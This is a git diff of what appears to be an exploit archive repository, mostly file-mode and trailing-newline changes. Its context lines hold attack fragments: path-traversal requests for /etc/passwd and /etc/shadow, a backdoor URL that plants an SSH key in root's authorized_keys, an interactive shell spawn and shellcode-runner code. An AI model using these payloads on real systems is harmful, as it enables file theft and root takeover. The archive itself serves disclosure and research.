1ebb9bd1a..be15756aa --- a/platforms/linux/remote/37889.txt +++ b/platforms/linux/remote/37889.txt @@ -4,4 +4,4 @@ An attacker can exploit these issues to obtain sensitive information, to upload YingZhiPython 1.9 is vulnerable; other versions may also be affected. -ftp://www.example.com/../../../../../../../private/etc/passwd \ No newline at end of file +ftp://www.example.com/../../../../../../../private/etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/379.txt b/platforms/linux/remote/379.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/37949.txt b/platforms/linux/remote/37949.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/380.c b/platforms/linux/remote/380.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3815.c b/platforms/linux/remote/3815.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/382.c b/platforms/linux/remote/382.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/38203.txt b/platforms/linux/remote/38203.txt old mode 100755 new mode 100644 index 7f0d1301e..1c795810d --- a/platforms/linux/remote/38203.txt +++ b/platforms/linux/remote/38203.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary files within the Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected. -GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1 \ No newline at end of file +GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1 \ No newline at end of file diff --git a/platforms/linux/remote/3821.c b/platforms/linux/remote/3821.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3829.c b/platforms/linux/remote/3829.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/38522.txt b/platforms/linux/remote/38522.txt old mode 100755 new mode 100644 index 011b0d56a..bb8e3ecdd --- a/platforms/linux/remote/38522.txt +++ b/platforms/linux/remote/38522.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary local files withi www.example.com/../../../../../../../../etc/passwd -www.example.com/../../../../../../../../etc/shadow \ No newline at end of file +www.example.com/../../../../../../../../etc/shadow \ No newline at end of file diff --git a/platforms/linux/remote/386.c b/platforms/linux/remote/386.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/38680.html b/platforms/linux/remote/38680.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/387.c b/platforms/linux/remote/387.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/38741.txt b/platforms/linux/remote/38741.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/389.c b/platforms/linux/remote/389.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/39.c b/platforms/linux/remote/39.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/390.c b/platforms/linux/remote/390.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/39097.txt b/platforms/linux/remote/39097.txt old mode 100755 new mode 100644 index c1f22b39b..f4f53b295 --- a/platforms/linux/remote/39097.txt +++ b/platforms/linux/remote/39097.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to gain unauthorized access to the restricted Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected. curl -d'' -I http://www.example.com:3636/secure/control.php -wget -qO- --post-data='' http://www.example.com3636/secure/control.php \ No newline at end of file +wget -qO- --post-data='' http://www.example.com3636/secure/control.php \ No newline at end of file diff --git a/platforms/linux/remote/39155.txt b/platforms/linux/remote/39155.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/392.c b/platforms/linux/remote/392.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3922.c b/platforms/linux/remote/3922.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/39499.txt b/platforms/linux/remote/39499.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/397.c b/platforms/linux/remote/397.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/39736.txt b/platforms/linux/remote/39736.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/398.c b/platforms/linux/remote/398.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/399.c b/platforms/linux/remote/399.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/400.c b/platforms/linux/remote/400.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40064.txt b/platforms/linux/remote/40064.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40113.txt b/platforms/linux/remote/40113.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40119.md b/platforms/linux/remote/40119.md old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40167.txt b/platforms/linux/remote/40167.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40201.txt b/platforms/linux/remote/40201.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40232.py b/platforms/linux/remote/40232.py index 9716b8f40..0f40a50b1 100755 --- a/platforms/linux/remote/40232.py +++ b/platforms/linux/remote/40232.py @@ -467,4 +467,4 @@ if __name__ == '__main__': time.sleep(0.01) sys.exit(1) -#EOF \ No newline at end of file +#EOF \ No newline at end of file diff --git a/platforms/linux/remote/405.c b/platforms/linux/remote/405.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/408.c b/platforms/linux/remote/408.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4087.c b/platforms/linux/remote/4087.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40916.txt b/platforms/linux/remote/40916.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/40963.txt b/platforms/linux/remote/40963.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/41013.txt b/platforms/linux/remote/41013.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/413.c b/platforms/linux/remote/413.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/416.c b/platforms/linux/remote/416.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4162.c b/platforms/linux/remote/4162.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/41910.sh b/platforms/linux/remote/41910.sh index b7c340c52..1f0c6168f 100755 --- a/platforms/linux/remote/41910.sh +++ b/platforms/linux/remote/41910.sh @@ -190,5 +190,4 @@ fi # Done -echo -e "\n[*] All done. Exiting" - +echo -e "\n[*] All done. Exiting" \ No newline at end of file diff --git a/platforms/linux/remote/42078.js b/platforms/linux/remote/42078.js old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/424.c b/platforms/linux/remote/424.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4243.c b/platforms/linux/remote/4243.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/42695.rb b/platforms/linux/remote/42695.rb index 0963c2ce2..7716eba0e 100755 --- a/platforms/linux/remote/42695.rb +++ b/platforms/linux/remote/42695.rb @@ -116,4 +116,4 @@ sub get_file { } -} +} \ No newline at end of file diff --git a/platforms/linux/remote/42697.rb b/platforms/linux/remote/42697.rb index 06ec61dc9..b57af89b7 100755 --- a/platforms/linux/remote/42697.rb +++ b/platforms/linux/remote/42697.rb @@ -233,5 +233,4 @@ sub get_license() { @out = ( '2', substr($error_msg, 12, -1)); # Remove 'X-AV-ERROR: 'and \n return \@out; } -} - +} \ No newline at end of file diff --git a/platforms/linux/remote/42708.rb b/platforms/linux/remote/42708.rb index 94c7ed716..41b73f387 100755 --- a/platforms/linux/remote/42708.rb +++ b/platforms/linux/remote/42708.rb @@ -151,4 +151,4 @@ sub sync_rserver # push @ret, "0"; return "0"; -} +} \ No newline at end of file diff --git a/platforms/linux/remote/42709.rb b/platforms/linux/remote/42709.rb index 715b04266..3354062f1 100755 --- a/platforms/linux/remote/42709.rb +++ b/platforms/linux/remote/42709.rb @@ -167,5 +167,4 @@ sub get_log_line { push(@ret,"path not auth"); return \@ret; } -} - +} \ No newline at end of file diff --git a/platforms/linux/remote/42790.txt b/platforms/linux/remote/42790.txt old mode 100755 new mode 100644 index 8c736ef2c..1b5ef7050 --- a/platforms/linux/remote/42790.txt +++ b/platforms/linux/remote/42790.txt @@ -30,4 +30,4 @@ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ----------------------snip--------------------------- +---------------------snip--------------------------- \ No newline at end of file diff --git a/platforms/linux/remote/42949.txt b/platforms/linux/remote/42949.txt old mode 100755 new mode 100644 index 32067b275..f02abb53c --- a/platforms/linux/remote/42949.txt +++ b/platforms/linux/remote/42949.txt @@ -14,4 +14,4 @@ https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1 https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27 # Just push your ssh key and get nice root access (ssh is open by default even from wifi guest) -https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27 +https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27 \ No newline at end of file diff --git a/platforms/linux/remote/42957.py b/platforms/linux/remote/42957.py index 63f703306..1a50f823a 100755 --- a/platforms/linux/remote/42957.py +++ b/platforms/linux/remote/42957.py @@ -163,4 +163,4 @@ s1.close() s2.close() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/platforms/linux/remote/42958.py b/platforms/linux/remote/42958.py index 87d045b9c..2d1c57ae1 100755 --- a/platforms/linux/remote/42958.py +++ b/platforms/linux/remote/42958.py @@ -113,4 +113,4 @@ print r1.status, r1.reason print r1.read() # 3. Solution: -# Update to Unitrends UEB 10 +# Update to Unitrends UEB 10 \ No newline at end of file diff --git a/platforms/linux/remote/4312.c b/platforms/linux/remote/4312.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/437.c b/platforms/linux/remote/437.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4437.c b/platforms/linux/remote/4437.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4478.c b/platforms/linux/remote/4478.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4514.c b/platforms/linux/remote/4514.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4533.c b/platforms/linux/remote/4533.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4534.c b/platforms/linux/remote/4534.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4537.c b/platforms/linux/remote/4537.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4541.c b/platforms/linux/remote/4541.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/46.c b/platforms/linux/remote/46.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/49.c b/platforms/linux/remote/49.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/4947.c b/platforms/linux/remote/4947.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/5224.php b/platforms/linux/remote/5224.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/5283.txt b/platforms/linux/remote/5283.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/5386.txt b/platforms/linux/remote/5386.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/55.c b/platforms/linux/remote/55.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/5622.txt b/platforms/linux/remote/5622.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/58.c b/platforms/linux/remote/58.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/580.c b/platforms/linux/remote/580.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/581.c b/platforms/linux/remote/581.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/608.c b/platforms/linux/remote/608.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/609.txt b/platforms/linux/remote/609.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/6094.txt b/platforms/linux/remote/6094.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/620.c b/platforms/linux/remote/620.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/63.c b/platforms/linux/remote/63.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/652.c b/platforms/linux/remote/652.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/660.c b/platforms/linux/remote/660.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/681.c b/platforms/linux/remote/681.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/712.c b/platforms/linux/remote/712.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/7151.c b/platforms/linux/remote/7151.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/7183.txt b/platforms/linux/remote/7183.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/74.c b/platforms/linux/remote/74.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/7701.txt b/platforms/linux/remote/7701.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/775.c b/platforms/linux/remote/775.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/78.c b/platforms/linux/remote/78.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/784.c b/platforms/linux/remote/784.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/785.c b/platforms/linux/remote/785.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8.c b/platforms/linux/remote/8.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/806.c b/platforms/linux/remote/806.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/812.c b/platforms/linux/remote/812.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/826.c b/platforms/linux/remote/826.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/831.c b/platforms/linux/remote/831.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8384.txt b/platforms/linux/remote/8384.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/84.c b/platforms/linux/remote/84.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8556.c b/platforms/linux/remote/8556.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8569.txt b/platforms/linux/remote/8569.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8570.txt b/platforms/linux/remote/8570.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/878.c b/platforms/linux/remote/878.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/88.c b/platforms/linux/remote/88.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/8880.txt b/platforms/linux/remote/8880.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/89.c b/platforms/linux/remote/89.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/900.c b/platforms/linux/remote/900.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/902.c b/platforms/linux/remote/902.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/903.c b/platforms/linux/remote/903.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/9143.txt b/platforms/linux/remote/9143.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/915.c b/platforms/linux/remote/915.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/934.c b/platforms/linux/remote/934.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/940.c b/platforms/linux/remote/940.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/970.c b/platforms/linux/remote/970.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/98.c b/platforms/linux/remote/98.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/981.c b/platforms/linux/remote/981.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/99.c b/platforms/linux/remote/99.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/14218.c b/platforms/linux/shellcode/14218.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/14219.c b/platforms/linux/shellcode/14219.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/14234.c b/platforms/linux/shellcode/14234.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/14235.c b/platforms/linux/shellcode/14235.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/14276.c b/platforms/linux/shellcode/14276.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/39336.c b/platforms/linux/shellcode/39336.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/39337.c b/platforms/linux/shellcode/39337.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/39338.c b/platforms/linux/shellcode/39338.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/41183.c b/platforms/linux/shellcode/41183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/shellcode/41375.c b/platforms/linux/shellcode/41375.c old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10261.txt b/platforms/linux/webapps/10261.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10262.txt b/platforms/linux/webapps/10262.txt old mode 100755 new mode 100644 index d6eb97f63..c64ab3a8f --- a/platforms/linux/webapps/10262.txt +++ b/platforms/linux/webapps/10262.txt @@ -46,4 +46,4 @@ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/linux/webapps/10263.txt b/platforms/linux/webapps/10263.txt old mode 100755 new mode 100644 index 5bf524e2e..3bbd4aca5 --- a/platforms/linux/webapps/10263.txt +++ b/platforms/linux/webapps/10263.txt @@ -64,4 +64,4 @@ - [ Gorontalo / 2009 ] \ No newline at end of file + [ Gorontalo / 2009 ] \ No newline at end of file diff --git a/platforms/linux/webapps/10426.txt b/platforms/linux/webapps/10426.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10427.txt b/platforms/linux/webapps/10427.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10429.txt b/platforms/linux/webapps/10429.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10430.txt b/platforms/linux/webapps/10430.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10433.txt b/platforms/linux/webapps/10433.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10755.txt b/platforms/linux/webapps/10755.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10756.txt b/platforms/linux/webapps/10756.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/10757.txt b/platforms/linux/webapps/10757.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/14177.txt b/platforms/linux/webapps/14177.txt old mode 100755 new mode 100644 index bf8a21637..f2fa68869 --- a/platforms/linux/webapps/14177.txt +++ b/platforms/linux/webapps/14177.txt @@ -91,4 +91,4 @@ Changelog Web: http://www.zeroscience.mk -e-mail: lab@zeroscience.mk \ No newline at end of file +e-mail: lab@zeroscience.mk \ No newline at end of file diff --git a/platforms/linux/webapps/19406.txt b/platforms/linux/webapps/19406.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/20037.txt b/platforms/linux/webapps/20037.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/23110.txt b/platforms/linux/webapps/23110.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/24932.txt b/platforms/linux/webapps/24932.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/28175.txt b/platforms/linux/webapps/28175.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/28243.txt b/platforms/linux/webapps/28243.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/28558.txt b/platforms/linux/webapps/28558.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/28653.txt b/platforms/linux/webapps/28653.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/28979.txt b/platforms/linux/webapps/28979.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/30085.txt b/platforms/linux/webapps/30085.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/34086.txt b/platforms/linux/webapps/34086.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/34241.txt b/platforms/linux/webapps/34241.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/34672.txt b/platforms/linux/webapps/34672.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/36442.txt b/platforms/linux/webapps/36442.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/36619.txt b/platforms/linux/webapps/36619.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/36689.txt b/platforms/linux/webapps/36689.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/36963.txt b/platforms/linux/webapps/36963.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/37442.txt b/platforms/linux/webapps/37442.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/38833.txt b/platforms/linux/webapps/38833.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/39500.txt b/platforms/linux/webapps/39500.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/39642.txt b/platforms/linux/webapps/39642.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/40171.txt b/platforms/linux/webapps/40171.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/40180.txt b/platforms/linux/webapps/40180.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/40249.txt b/platforms/linux/webapps/40249.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/40377.txt b/platforms/linux/webapps/40377.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/40378.txt b/platforms/linux/webapps/40378.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/41040.txt b/platforms/linux/webapps/41040.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/41141.txt b/platforms/linux/webapps/41141.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/41312.txt b/platforms/linux/webapps/41312.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/41437.txt b/platforms/linux/webapps/41437.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/41963.txt b/platforms/linux/webapps/41963.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/42269.txt b/platforms/linux/webapps/42269.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/42290.txt b/platforms/linux/webapps/42290.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/42306.txt b/platforms/linux/webapps/42306.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/42314.txt b/platforms/linux/webapps/42314.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/webapps/42769.rb b/platforms/linux/webapps/42769.rb index a43ad8f9a..a5be1134b 100755 --- a/platforms/linux/webapps/42769.rb +++ b/platforms/linux/webapps/42769.rb @@ -100,4 +100,4 @@ class MetasploitModule < Msf::Exploit::Remote }) end -end +end \ No newline at end of file diff --git a/platforms/linux/webapps/42975.txt b/platforms/linux/webapps/42975.txt old mode 100755 new mode 100644 index 98a89002f..37b8f2b97 --- a/platforms/linux/webapps/42975.txt +++ b/platforms/linux/webapps/42975.txt @@ -19,4 +19,4 @@ https://ip:8443/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE https://ip/dsc/%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AFhome%C0%AFdgate%C0%AFiptables -Then the file will be visible +Then the file will be visible \ No newline at end of file diff --git a/platforms/linux/webapps/42991.txt b/platforms/linux/webapps/42991.txt old mode 100755 new mode 100644 index 27cf4fae4..d02cd9176 --- a/platforms/linux/webapps/42991.txt +++ b/platforms/linux/webapps/42991.txt @@ -98,4 +98,4 @@ MESSAGE=x-chat/control Fix: ==== -Vendor has confirmed the vulnerability, will be fixed in the next release. +Vendor has confirmed the vulnerability, will be fixed in the next release. \ No newline at end of file diff --git a/platforms/linux_crisv32/shellcode/40128.c b/platforms/linux_crisv32/shellcode/40128.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/13298.c b/platforms/linux_mips/shellcode/13298.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/13299.c b/platforms/linux_mips/shellcode/13299.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/13300.c b/platforms/linux_mips/shellcode/13300.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/17940.c b/platforms/linux_mips/shellcode/17940.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/18162.c b/platforms/linux_mips/shellcode/18162.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/18163.c b/platforms/linux_mips/shellcode/18163.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/18226.c b/platforms/linux_mips/shellcode/18226.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/18227.c b/platforms/linux_mips/shellcode/18227.c old mode 100755 new mode 100644 index 27862d168..a4f0c69a5 --- a/platforms/linux_mips/shellcode/18227.c +++ b/platforms/linux_mips/shellcode/18227.c @@ -21,4 +21,4 @@ void main(void) printf("size: %d\n", sizeof(sc)); s = sc; s(); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux_mips/shellcode/29436.asm b/platforms/linux_mips/shellcode/29436.asm old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/35868.c b/platforms/linux_mips/shellcode/35868.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/36274.c b/platforms/linux_mips/shellcode/36274.c old mode 100755 new mode 100644 diff --git a/platforms/linux_mips/shellcode/36276.c b/platforms/linux_mips/shellcode/36276.c old mode 100755 new mode 100644 diff --git a/platforms/linux_ppc/shellcode/13301.c b/platforms/linux_ppc/shellcode/13301.c old mode 100755 new mode 100644 diff --git a/platforms/linux_ppc/shellcode/13302.c b/platforms/linux_ppc/shellcode/13302.c old mode 100755 new mode 100644 diff --git a/platforms/linux_ppc/shellcode/13303.c b/platforms/linux_ppc/shellcode/13303.c old mode 100755 new mode 100644 diff --git a/platforms/linux_ppc/shellcode/13304.c b/platforms/linux_ppc/shellcode/13304.c old mode 100755 new mode 100644 diff --git a/platforms/linux_sparc/remote/346.c b/platforms/linux_sparc/remote/346.c old mode 100755 new mode 100644 diff --git a/platforms/linux_sparc/shellcode/13305.c b/platforms/linux_sparc/shellcode/13305.c old mode 100755 new mode 100644 diff --git a/platforms/linux_sparc/shellcode/13306.c b/platforms/linux_sparc/shellcode/13306.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/40952.c b/platforms/macos/dos/40952.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/40954.c b/platforms/macos/dos/40954.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/41790.c b/platforms/macos/dos/41790.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/41791.c b/platforms/macos/dos/41791.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/41797.c b/platforms/macos/dos/41797.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/41798.c b/platforms/macos/dos/41798.c old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/42046.txt b/platforms/macos/dos/42046.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/42047.txt b/platforms/macos/dos/42047.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/dos/42056.c b/platforms/macos/dos/42056.c old mode 100755 new mode 100644 diff --git a/platforms/macos/local/40669.txt b/platforms/macos/local/40669.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/local/40956.c b/platforms/macos/local/40956.c old mode 100755 new mode 100644 diff --git a/platforms/macos/local/40957.c b/platforms/macos/local/40957.c old mode 100755 new mode 100644 diff --git a/platforms/macos/local/41853.txt b/platforms/macos/local/41853.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/local/41854.txt b/platforms/macos/local/41854.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/local/41952.txt b/platforms/macos/local/41952.txt old mode 100755 new mode 100644 index fdf5af594..fae662011 --- a/platforms/macos/local/41952.txt +++ b/platforms/macos/local/41952.txt @@ -40,4 +40,4 @@ p=subprocess.call(["/bin/sh","-i"]); /Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/ -3) Wait until the victim opens a VPN connection. \ No newline at end of file +3) Wait until the victim opens a VPN connection. \ No newline at end of file diff --git a/platforms/macos/local/42334.txt b/platforms/macos/local/42334.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/local/42454.txt b/platforms/macos/local/42454.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/remote/41443.html b/platforms/macos/remote/41443.html old mode 100755 new mode 100644 diff --git a/platforms/macos/remote/41964.html b/platforms/macos/remote/41964.html old mode 100755 new mode 100644 diff --git a/platforms/macos/remote/42125.txt b/platforms/macos/remote/42125.txt old mode 100755 new mode 100644 diff --git a/platforms/macos/webapps/41449.html b/platforms/macos/webapps/41449.html old mode 100755 new mode 100644 diff --git a/platforms/minix/dos/6120.txt b/platforms/minix/dos/6120.txt old mode 100755 new 